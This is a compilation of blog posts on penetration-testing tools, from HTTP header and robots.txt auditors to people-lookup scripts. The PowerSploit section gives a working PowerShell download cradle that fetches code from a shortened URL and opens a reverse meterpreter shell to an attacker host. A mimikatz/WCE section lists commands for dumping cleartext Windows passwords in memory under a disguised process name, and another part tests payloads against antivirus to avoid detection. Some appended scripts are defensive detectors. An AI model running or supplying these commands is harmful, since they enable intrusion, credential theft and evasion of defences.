Bash script for checking HTTP headers for security

To check HTTP headers from a security perspective you can visit Security Headers. It checks for the following headers:

Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection

I wrote a bash script which checks the HTTP headers of a website against securityheaders.com and prints the output.

git clone https://github.com/niravkdesai/securityheaders.git

chmod +x header.sh

./header.sh

[Screenshot: HTTP-header-for-security output]
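The same checks the online service performs can be run locally. The following Python script is an added example, not the script from the repository above; it audits one response's headers for the items listed in this post (HSTS, CSP, X-Frame-Options, NoSniff, X-XSS-Protection, the cross-domain policy header, CORS origin, charset, and the Server/X-Powered-By information leaks). The sample header set is constructed, and the thresholds (one-year HSTS max-age, DENY/SAMEORIGIN for framing) are the assumptions the audit encodes.

```python
import re
from typing import Dict, List


def audit_headers(headers: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit one HTTP response's headers.

    Returns {"missing": [...], "weak": [...], "leaks": [...]} where each entry is a
    header name or a short reason. Header-name matching is case-insensitive.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    out: Dict[str, List[str]] = {"missing": [], "weak": [], "leaks": []}

    def require(name: str):
        # Record the header as missing, or return its value for a follow-up check.
        if name.lower() not in h:
            out["missing"].append(name)
            return None
        return h[name.lower()]

    # Strict-Transport-Security: assumption is a max-age of at least one year.
    hsts = require("Strict-Transport-Security")
    if hsts is not None:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < 31536000:
            out["weak"].append("Strict-Transport-Security: max-age below one year")

    # Content-Security-Policy: present, and not relying on unsafe-inline/unsafe-eval.
    csp = require("Content-Security-Policy")
    if csp is not None and re.search(r"'unsafe-(inline|eval)'", csp):
        out["weak"].append("Content-Security-Policy: allows unsafe-inline/unsafe-eval")

    # X-Frame-Options: only DENY or SAMEORIGIN actually prevent clickjacking.
    xfo = require("X-Frame-Options")
    if xfo is not None and xfo.upper() not in ("DENY", "SAMEORIGIN"):
        out["weak"].append("X-Frame-Options: not DENY or SAMEORIGIN")

    # NoSniff: the only meaningful value is "nosniff".
    nosniff = require("X-Content-Type-Options")
    if nosniff is not None and nosniff.lower() != "nosniff":
        out["weak"].append("X-Content-Type-Options: not 'nosniff'")

    # Legacy header; the online checker lists it, so presence is reported only.
    require("X-XSS-Protection")

    # Cross-domain (Flash/PDF) policy: "none" or "master-only" are the safe values.
    xpcdp = require("X-Permitted-Cross-Domain-Policies")
    if xpcdp is not None and xpcdp.lower() not in ("none", "master-only"):
        out["weak"].append("X-Permitted-Cross-Domain-Policies: too permissive")

    # A wildcard CORS origin is worth a review even if it is intended.
    if h.get("access-control-allow-origin") == "*":
        out["weak"].append("Access-Control-Allow-Origin: wildcard origin")

    # UTF-8 character encoding: an explicit charset avoids encoding-based XSS tricks.
    if "charset=" not in h.get("content-type", "").lower():
        out["weak"].append("Content-Type: no explicit charset (expect charset=utf-8)")

    # Version information leaks.
    for leak in ("Server", "X-Powered-By"):
        if h.get(leak.lower()):
            out["leaks"].append(f"{leak}: {h[leak.lower()]}")
    return out


def fetch_headers(url: str, timeout: float = 5.0) -> Dict[str, str]:
    """Fetch response headers with a HEAD request using only the standard library."""
    import urllib.error
    import urllib.request
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return dict(resp.headers.items())
    except urllib.error.HTTPError as err:
        return dict(err.headers.items())   # 4xx/5xx responses still carry headers


# Constructed sample response headers (not captured from any real site).
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10",
    "Content-Type": "text/html",
    "X-Frame-Options": "ALLOWALL",
    "Strict-Transport-Security": "max-age=600",
    "Content-Security-Policy": "default-src 'self' 'unsafe-inline'",
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    import json
    import sys
    headers = fetch_headers(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HEADERS
    print(json.dumps(audit_headers(headers), indent=2))
```

Run it with a URL as the first argument to audit a live site you are responsible for; with no argument it audits the constructed sample, which reports a short HSTS lifetime, an inline-permitting CSP, a useless X-Frame-Options value, a missing charset and two version leaks.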

Bash script for checking an account that has been compromised in a data breach.

Troy Hunt started a great website for checking whether your email address has been compromised in a data breach. Right now the leaked email addresses from the Adobe, Stratfor, Gawker, Pixel Federation, Yahoo!, Sony and Vodafone breaches are listed. You can check manually on their site.

I wrote a simple bash script for checking against their site whether an email address has been compromised or not. You can also write it in Python using the simple requests module.

[Screenshot: python-havebeenpwned]

[Screenshot: have-i-been-pwned bash script]

Usage:-
git clone https://github.com/niravkdesai/haveibeenpwned.git

cd haveibeenpwned

chmod +x haveibeenpwned.sh

./haveibeenpwned.sh

Please enter email address to check against http://haveibeenpwned.com

troyhunt%40hotmail.com

You have been pwned in ["Adobe"] breach

Python script for auditing robots.txt

One year ago I wrote about different methods to exploit the robots.txt file; you can find it here. Sometimes, due to weak directory permissions, you can get into a directory that robots.txt disallows. This Python script checks the HTTP status code of each Disallow entry in order to determine automatically whether those directories are accessible or not. For the original article click here.

It requires Python 3 and the urllib3 module.

git clone https://github.com/behindthefirewalls/Parsero.git
cd Parsero
python3 parsero.py -h
python3 parsero.py -u localhost/mutillidae

[Screenshot: auditing robots.txt with Parsero]

Now you can see which disallowed directories are actually accessible, i.e. those for which we got HTTP status code 200.
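The core of such an audit is a robots.txt parser plus a status check per Disallow entry. The following Python script is an added example, not Parsero's code; it parses the Disallow lines (ignoring comments, blank entries and wildcard patterns that do not map to a single URL), resolves each path against the host root, and reports the entries that answer 200. The sample robots.txt and the stub status lookup are constructed so the audit runs offline; `http_status` is the real fetcher you would pass instead.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Tuple


def parse_disallow(robots_txt: str) -> List[str]:
    """Return the non-empty Disallow paths from a robots.txt body, in order, deduplicated."""
    paths: List[str] = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and whitespace
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        # "Disallow:" with an empty value means "allow everything" and is skipped.
        if field.lower() == "disallow" and value and value not in paths:
            paths.append(value)
    return paths


def audit_disallowed(base_url: str, robots_txt: str,
                     fetch_status: Callable[[str], int]) -> List[Tuple[str, int]]:
    """Resolve every Disallow path against base_url and record its HTTP status.

    Paths in robots.txt are relative to the host root, so base_url should be the
    site root (e.g. "http://localhost/"), not a sub-directory. Wildcard entries
    ("*" or "$") describe patterns rather than one URL and are skipped.
    """
    results: List[Tuple[str, int]] = []
    for path in parse_disallow(robots_txt):
        if "*" in path or "$" in path:
            continue
        url = urllib.parse.urljoin(base_url, path)
        results.append((url, fetch_status(url)))
    return results


def exposed(results: List[Tuple[str, int]]) -> List[str]:
    """URLs that are disallowed for crawlers but served normally (status 200)."""
    return [url for url, status in results if status == 200]


def http_status(url: str, timeout: float = 5.0) -> int:
    """Real fetcher: GET the URL and return the final status code (redirects are followed)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


# Constructed sample robots.txt (not taken from any real site).
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/   # old database dumps
Disallow: /cgi-bin/
Disallow:
Disallow: /*.sql$
Allow: /public/
"""

# Constructed stand-in for a web server, so the example runs offline.
FAKE_STATUS = {
    "http://localhost/admin/": 403,
    "http://localhost/backup/": 200,
    "http://localhost/cgi-bin/": 404,
}


def stub_status(url: str) -> int:
    return FAKE_STATUS.get(url, 404)


if __name__ == "__main__":
    for url, status in audit_disallowed("http://localhost/", SAMPLE_ROBOTS, stub_status):
        print(f"{status}  {url}")
    print("accessible:", exposed(audit_disallowed("http://localhost/", SAMPLE_ROBOTS, stub_status)))
```

Against the constructed sample only /backup/ is reported as accessible, which is exactly the case the post describes: a directory hidden from crawlers but not protected by the server. Pass `http_status` instead of `stub_status` to audit a site you administer.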

Truecaller Name Retriever python script

Truecaller is a global phone directory application for smartphones and feature phones, also accessible via a website. If you have an unknown mobile number you can search for it on the Truecaller website or in the Truecaller application. This Python script was written by A'mmer Almadani. The script is still in development; more functions will be added soon.

git clone https://github.com/Logic-gate/callerpy.git

cd callerpy

Now open the caller.py file and enter your Twitter credentials on lines 39 and 40; they are used for authentication.

python caller.py -h

usage: callerpy.py [-h] -n number [-c country] [-cc country code] -l login

TrueCaller Name Retriever

optional arguments:
-h, --help            show this help message and exit
-n number, --number number
Phone Number Without Country Code (default: None)
-c country, --country country
Country | String (default: None)
-cc country code, --countrycode country code
Country | Int (default: None)
-l login, --login login
Login Method | twitter, g+, fb (default: twitter)

python callerpy.py -n 9016986989 -c india-other -l twitter

[Screenshot: Truecaller Name Retriever Python script output]

Python script to search email addresses against the Gravatar database.

Gravatar is a service for providing globally unique avatars. When a user posts a comment on a blog that requires an e-mail address, the blogging software checks whether that e-mail address has an associated avatar at Gravatar. If so, the Gravatar is shown along with the comment. The script is made by averagesecurityguy. It takes email addresses and checks them against the Gravatar database; if an email address exists there, it extracts the username, location and account details. First we will understand how it works; for developer resources click here.

To view the details for an email address we need to create a hash of the address. For example, if you want to check the email address nirav.desai1991@gmail.com, you have to create the MD5 hash of the address.

root@bt:~#echo -n nirav.desai1991@gmail.com| md5sum
dfd36ad92895ea6b7829d2918ad07fcf

To extract details about the email address we have to make the following request:
http://en.gravatar.com/dfd36ad92895ea6b7829d2918ad07fcf.json

And there we get the details of my Gravatar profile.

That is a simple description of how it works. Now to the script: gravatar.py takes a file with a list of email addresses, one per line, and searches Gravatar for information about each address. If an address is registered with Gravatar, selected data points are extracted from the Gravatar profile.

wget https://raw.github.com/averagesecurityguy/scripts/master/gravatar.py

Now you need a file containing the list of email addresses.

python gravatar.py email

[Screenshot: gravatar email address search]

Cloudflare Resolver Bash script

CloudFlare is a content delivery network and distributed DNS service marketed as improving website performance and speed and providing security. One year ago I posted different methods to find out the real IP behind Cloudflare.

All those methods only work if there is an admin misconfiguration.

(1)DNS bruteforce

(2)NMAP

(3)Netcraft toolbar

I made a simple bash script which does all of this for you; you just have to provide the name of the website which is behind Cloudflare.

git clone https://github.com/niravkdesai/cloudflare-ip.git

cd cloudflare-ip

chmod +x cloudflare-ip.sh

./cloudflare-ip.sh

In the script you have to change the IP on line 45. I used the dns variable because for unknown DNS names my ISP redirects to its own address, so we can tell whether a response is valid or not. Change that IP according to your setup.

[Screenshot: cloudflare-resolver]

Bytescanner API

As a penetration tester, sometimes we have to test our payload against different AVs so we know it will not be detected during the actual test. Most people use VirusTotal, but as we know VirusTotal shares its results with AV companies, so after some time our payload is detected by more AVs.

Bytescanner is similar to VirusTotal, but they don't share their results with AV companies. They also provide Python, C, Delphi, Java, C# and PHP APIs.

(1)Signup at Bytescanner

(2)Confirm your email address.

(3)Download the API from the SDK menu. I'm going to use the Python API; you can use another one.

(4)Now open the Python file and on lines 12 and 13 replace youremailaddress@bytescanner.com and yourbytescannerpassword with your email address and password respectively.

(5)Compile it and make it executable.

chmod +x bsPython.py

python bsPython.py

(6)Now enter the path of the file to scan.

[Screenshot: Bytescanner Python API]

Get shell using powersploit

If you get physical access to a machine for a very short time and you want to get a shell, you can use the Invoke-Shellcode PowerSploit function. PowerShell must be installed on the victim machine to use this utility. For more details you can visit this link. I just want to give a demo of how to get a shell using PowerSploit.

First start a listener in Metasploit. The Invoke-Shellcode function supports windows/meterpreter/reverse_http and windows/meterpreter/reverse_https, so set one of those payloads in the listener.

[Screenshot: metasploit-listener]

Now on the victim machine open a PowerShell prompt and enter the following code:

[Screenshot: powersploit-invoke-shellcode]

IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.168.56.101 -Lport 443 -Force

Note: Change Lhost, payload and Lport according to your listener.

[Screenshot: shell using PowerSploit]

And bingo, you will get a shell.

Different Methods to Get Clear Text windows Passwords.

Get clear text password:-
Following are different methods to get clear text Windows passwords from Metasploit.

(1)Using mimikatz or WCE, get the clear text password of the victim.

(2)You can also use the mimikatz password dump method.

(3)You can also use the mimikatz meterpreter plugin.

meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can run WCE and mimikatz in memory without uploading the binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
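Both of the last two sections (the PowerSploit download cradle and the mimikatz/WCE credential dumps, including the in-memory variant that runs under the calc.exe name) leave traces that a blue team can match on. The following Python script is an added example, not code from PowerSploit, mimikatz or Metasploit; it runs a small rule set over constructed Windows log events (PowerShell script-block text and process-creation command lines). The event shapes, rule names and sample lines are assumptions made for the example; the patterns themselves come from the command lines shown in this post.

```python
import re
from typing import Dict, List, Tuple

# Detection rules: name -> regex applied to the script text and command line of an event.
RULES = {
    # IEX (New-Object Net.WebClient).DownloadString(...) download-and-execute cradle
    "ps_download_cradle": re.compile(r"(?:IEX|Invoke-Expression)\b.*DownloadString\(", re.I),
    "powersploit_invoke_shellcode": re.compile(r"\bInvoke-Shellcode\b", re.I),
    "mimikatz_logonpasswords": re.compile(r"sekurlsa::logonPasswords", re.I),
    "meterpreter_mimikatz_ext": re.compile(r"\bmimikatz_command\b|\bload mimikatz\b", re.I),
    # WCE writing its dump to a file (-o <file>)
    "wce_output_flag": re.compile(r"\bwce\.exe\b.*\s-o\s", re.I),
}

# The in-memory trick above launches the tool under a harmless image name; calc.exe
# never takes command-line arguments, so arguments on it are suspicious by themselves.
NO_ARG_BINARIES = {"calc.exe"}


def scan_event(event: Dict[str, object]) -> List[str]:
    """Return the names of all rules matching one event.

    Expected keys (assumed event shape): "script" for PowerShell 4104 script-block
    text, "image" and "cmdline" for a 4688 / Sysmon process-creation event.
    """
    text = f'{event.get("script", "")} {event.get("cmdline", "")}'
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    image = str(event.get("image", "")).rsplit("\\", 1)[-1].lower()
    if image in NO_ARG_BINARIES and len(str(event.get("cmdline", "")).split()) > 1:
        hits.append("no_arg_binary_with_arguments")
    return hits


def scan_log(events: List[Dict[str, object]]) -> List[Tuple[int, List[str]]]:
    """Scan a list of events; return (index, matched rule names) for every event that hit."""
    return [(i, scan_event(e)) for i, e in enumerate(events) if scan_event(e)]


# Constructed sample events (not real telemetry; URL and IP are placeholders).
SAMPLE_EVENTS = [
    {"event": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString("
                              "'http://example.invalid/ps1'); Invoke-Shellcode "
                              "-Payload windows/meterpreter/reverse_http "
                              "-Lhost 192.0.2.10 -Lport 443 -Force"},
    {"event": 4688, "image": "C:\\Windows\\System32\\calc.exe",
     "cmdline": 'calc.exe "sekurlsa::logonPasswords full" exit'},
    {"event": 4688, "image": "C:\\Windows\\System32\\calc.exe", "cmdline": "calc.exe"},
    {"event": 4688, "image": "C:\\Temp\\wce.exe", "cmdline": "wce.exe -o foo.txt"},
    {"event": 4104, "script": "Get-ChildItem C:\\Users | Measure-Object"},
]

if __name__ == "__main__":
    for idx, names in scan_log(SAMPLE_EVENTS):
        print(f"event #{idx} ({SAMPLE_EVENTS[idx]['event']}): {', '.join(names)}")
```

The plain calc.exe launch and the Get-ChildItem script block produce no hits, while the cradle, the renamed mimikatz process and the WCE dump each trigger the matching rules; feeding real 4104 and 4688/Sysmon events through `scan_event` is the obvious next step for a SIEM rule.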